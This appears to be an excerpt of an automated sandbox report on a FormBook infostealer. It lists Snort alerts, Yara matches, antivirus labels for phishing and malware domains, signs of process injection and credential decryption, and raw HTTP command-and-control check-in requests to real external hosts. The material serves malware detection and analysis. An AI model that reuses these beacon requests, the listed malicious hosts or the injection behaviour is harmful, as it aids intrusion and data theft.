      Source Port:49916
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.191.208.5049916802031412 02/13/23-19:05:19.753523
      SID:2031412
      Source Port:49916
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20208.91.197.9149875802031449 02/13/23-19:01:51.132485
      SID:2031449
      Source Port:49875
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20173.255.194.13449893802031453 02/13/23-19:02:46.627311
      SID:2031453
      Source Port:49893
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20147.92.47.18249888802031449 02/13/23-19:02:32.963635
      SID:2031449
      Source Port:49888
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20173.255.194.13449893802031412 02/13/23-19:02:46.627311
      SID:2031412
      Source Port:49893
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20217.160.0.6449870802031412 02/13/23-19:01:37.803877
      SID:2031412
      Source Port:49870
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20217.160.0.6449870802031453 02/13/23-19:01:37.803877
      SID:2031453
      Source Port:49870
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.215.4.3649904802031449 02/13/23-19:04:45.806905
      SID:2031449
      Source Port:49904
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.215.4.3649840802031449 02/13/23-18:59:45.026565
      SID:2031449
      Source Port:49840
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.191.208.5049851802031449 02/13/23-19:00:34.698267
      SID:2031449
      Source Port:49851
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20217.160.0.6449870802031449 02/13/23-19:01:37.803877
      SID:2031449
      Source Port:49870
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.191.208.5049916802031449 02/13/23-19:05:19.753523
      SID:2031449
      Source Port:49916
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.201.1.1.155105532023883 02/13/23-19:02:09.891653
      SID:2023883
      Source Port:55105
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.11.20173.255.194.13449893802031449 02/13/23-19:02:46.627311
      SID:2031449
      Source Port:49893
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.215.4.3649904802031453 02/13/23-19:04:45.806905
      SID:2031453
      Source Port:49904
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.215.4.3649904802031412 02/13/23-19:04:45.806905
      SID:2031412
      Source Port:49904
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Antivirus detection for URL or domain
      Source: http://www.brothersbears.com/gant/Avira URL Cloud: Label: phishing
      Source: http://www.thejointcomission.orgAvira URL Cloud: Label: malware
      Source: http://www.brothersbears.com/?fp=B0INY8snl8mw%2BcAJH72nUzYVCaUxbDaGdZbUB3wx2UlG%2BELJV8E7p0rxWg6dgbHAvira URL Cloud: Label: phishing
      Source: http://www.touchdress.siteAvira URL Cloud: Label: malware
      Source: http://www.japurima.comAvira URL Cloud: Label: malware
      Source: http://www.b-yy.xyz/gant/Avira URL Cloud: Label: phishing
      Source: http://www.thejointcomission.org/gant/?j-Jh9P=MQtjD5X22poUyMv7ES4tvtca33r9y2dLYuXFkx7pCBQejezRhizA21G5ExCHCl6M5sdibhXBm0qE1VdFv4a9rmk6iqpvFYiiMw==&T9=bPxTYTKdI2Avira URL Cloud: Label: malware
      Source: http://www.brothersbears.comAvira URL Cloud: Label: phishing
      Source: http://www.thejointcomission.org/gant/Avira URL Cloud: Label: malware
      Source: 22.2.chkdsk.exe.52a68a8.1.unpackAvira: Label: TR/Patched.Ren.Gen8
      Source: 22.2.chkdsk.exe.5b83814.4.unpackAvira: Label: TR/Patched.Ren.Gen8
      Source: 25.2.firefox.exe.cf33814.0.unpackAvira: Label: TR/Patched.Ren.Gen8
      Source: 21.2.explorer.exe.13d43814.0.unpackAvira: Label: TR/Patched.Ren.Gen8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05024B40 CryptUnprotectData,22_2_05024B40
      Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49825 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.11.20:49826 version: TLS 1.2
      Source: Binary string: ielowutil.pdbGCTL source: explorer.exe, 00000015.00000002.7501684681.0000000013D43000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7441028199.00000000052A6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: chkdsk.exe, 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3418034862.00000000054C2000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: chkdsk.exe, chkdsk.exe, 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3418034862.00000000054C2000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: ielowutil.pdb source: explorer.exe, 00000015.00000002.7501684681.0000000013D43000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7441028199.00000000052A6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: firefox.pdb source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3660964442.000000000A365000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05023180 FindFirstFileW,FindNextFileW,FindClose,22_2_05023180
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi22_2_05018D60

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 142.44.131.177 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.37 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 173.255.194.134 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.64 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.154.231.174 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.215.4.36 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 147.92.47.182 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 198.251.81.247 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 103.191.208.50 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 75.102.22.168 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 162.241.225.69 80Jump to behavior
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 185.215.4.36:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 185.215.4.36:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 185.215.4.36:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49851 -> 103.191.208.50:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49851 -> 103.191.208.50:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49851 -> 103.191.208.50:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49870 -> 217.160.0.64:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49870 -> 217.160.0.64:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49870 -> 217.160.0.64:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49875 -> 208.91.197.91:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49875 -> 208.91.197.91:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49875 -> 208.91.197.91:80
      Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:55105 -> 1.1.1.1:53
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 147.92.47.182:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 147.92.47.182:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 147.92.47.182:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49893 -> 173.255.194.134:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49893 -> 173.255.194.134:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49893 -> 173.255.194.134:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49904 -> 185.215.4.36:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49904 -> 185.215.4.36:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49904 -> 185.215.4.36:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 103.191.208.50:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 103.191.208.50:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 103.191.208.50:80
      Performs DNS queries to domains with low reputation
      Source: DNS query: www.sciencevale.xyz
      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=5TA3zgeHNm1wf6Thb5AMtjQQLB1qlu2Rn/MQ6MujY0wd45AEg4BITkIozYXp1KG/kBQAm1Ey7A9M4ZpJCjezXwYaBakyUBQ9Vg==&T9=bPxTYTKdI2 HTTP/1.1Host: www.gargaloid.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=2JL3CIBt3IC0PgoAudQ1L9Eb6D+VDac3U4mviwi6NXYkyXwKlhT1jupAATRxZoEWPtU5/NPFAf7q3b9zYMRU8+5k3iEXReAvBw==&T9=bPxTYTKdI2 HTTP/1.1Host: www.grenoble-informatique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=TyiG4SYT4QZjW5cpsFN/2IY0LPBGgIfJh6ADM61dYWsbGNZtiA4uKO4tvwXfoLZtueIaX5TbuF1grn0UQt7nGEyexgA9LEEsmA==&T9=bPxTYTKdI2 HTTP/1.1Host: www.treebarktees.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=2tUZKRHByxlttwUxv+GOcisphN8ZGwJH956H6V+vFw98R8B9R+q1qFuRbo6W7NeIxARixWcpsfkmwl3+P8H59+TtZSMQFDV9NQ==&T9=bPxTYTKdI2 HTTP/1.1Host: www.otopodlogi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=kZeeE52Eo10vzDTOQ1ht8j81CNi5RiJJgw5DqHYq9Uu9KUllXVwDaVf8WWuhPaYSyfOYD/3vstXpbIR6gdGLFZ+mUJD/YhgA6w==&T9=bPxTYTKdI2 HTTP/1.1Host: www.flyshareinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=lG1MXAoVmwgOpPlDaO5uOCVJTMHwk/fdWy8fBrW3vMUx4Eu1HaIGqjrCYnGNSU+uIBrfqi0XYB7pKAHIVdBFrPjvfY3MgrPiTA==&T9=bPxTYTKdI2 HTTP/1.1Host: www.lakeviewautomation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=UNNYdcSQH8G7azuEeyjHGvIpwoKghrgSH3Udh5NSOmta1bwA4yZMM4UvAxe/iGptPmuGT4M6JuNJB68yuzE0hMzX7pwOCu8H8A==&T9=bPxTYTKdI2 HTTP/1.1Host: www.performingartshub.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=HgCX1yPl02YVZ8ntsD2Fu2rJboCHorDOJXbMMq44vtOckm/otWVg58UmWCLCWofbQIl3m/yqZE5fIEBzZKMECrgvXJ6dLgzQIQ==&T9=bPxTYTKdI2 HTTP/1.1Host: www.brothersbears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=0t3ZvwpEqVsRCOwRlikXMWB7Ea95BZez04foFL6wYLCqffSg77P+YtyukHRVRGclol71et68nIyUJ+scOlPmXgSdPrpnjIlS4g==&T9=bPxTYTKdI2 HTTP/1.1Host: www.sciencevale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=/4uePDAndv7VRKlxJSWWYF+9JWnpnxC+Pqu0glR/gWphXDvAzD/IhhQUyrVK/VMLXFR13n1QlAsq5EiJSOA8G9jIKMVd5okpcw==&T9=bPxTYTKdI2 HTTP/1.1Host: www.hotelyeah.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=gtmxM9sVToXKjMyTASxBPF0sq9AFFQGD43p7DhxGmNljyvBNaufr2S5kOWNcewkSSruZtMGwxAitLcOH1ReRcd40xShNtBsThw==&T9=bPxTYTKdI2 HTTP/1.1Host: www.cc564966.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=MQtjD5X22poUyMv7ES4tvtca33r9y2dLYuXFkx7pCBQejezRhizA21G5ExCHCl6M5sdibhXBm0qE1VdFv4a9rmk6iqpvFYiiMw==&T9=bPxTYTKdI2 HTTP/1.1Host: www.thejointcomission.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=B0pNFIyvfWNbMZ+y1M/LgZADusV71feeQe6W+GB1ssl6KD/NibUunE4IvTatYpRgFtRcLWhob4pstpOdFq/XGd2nPwIBJf7TLg==&T9=bPxTYTKdI2 HTTP/1.1Host: www.dachmotors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=5TA3zgeHNm1wf6Thb5AMtjQQLB1qlu2Rn/MQ6MujY0wd45AEg4BITkIozYXp1KG/kBQAm1Ey7A9M4ZpJCjezXwYaBakyUBQ9Vg==&T9=bPxTYTKdI2 HTTP/1.1Host: www.gargaloid.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=2JL3CIBt3IC0PgoAudQ1L9Eb6D+VDac3U4mviwi6NXYkyXwKlhT1jupAATRxZoEWPtU5/NPFAf7q3b9zYMRU8+5k3iEXReAvBw==&T9=bPxTYTKdI2 HTTP/1.1Host: www.grenoble-informatique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=TyiG4SYT4QZjW5cpsFN/2IY0LPBGgIfJh6ADM61dYWsbGNZtiA4uKO4tvwXfoLZtueIaX5TbuF1grn0UQt7nGEyexgA9LEEsmA==&T9=bPxTYTKdI2 HTTP/1.1Host: www.treebarktees.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=2tUZKRHByxlttwUxv+GOcisphN8ZGwJH956H6V+vFw98R8B9R+q1qFuRbo6W7NeIxARixWcpsfkmwl3+P8H59+TtZSMQFDV9NQ==&T9=bPxTYTKdI2 HTTP/1.1Host: www.otopodlogi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=kZeeE52Eo10vzDTOQ1ht8j81CNi5RiJJgw5DqHYq9Uu9KUllXVwDaVf8WWuhPaYSyfOYD/3vstXpbIR6gdGLFZ+mUJD/YhgA6w==&T9=bPxTYTKdI2 HTTP/1.1Host: www.flyshareinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=lG1MXAoVmwgOpPlDaO5uOCVJTMHwk/fdWy8fBrW3vMUx4Eu1HaIGqjrCYnGNSU+uIBrfqi0XYB7pKAHIVdBFrPjvfY3MgrPiTA==&T9=bPxTYTKdI2 HTTP/1.1Host: www.lakeviewautomation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 217.160.0.37 217.160.0.37
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 13 Feb 2023 18:00:00 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 13 Feb 2023 18:00:02 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 13 Feb 2023 18:00:05 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
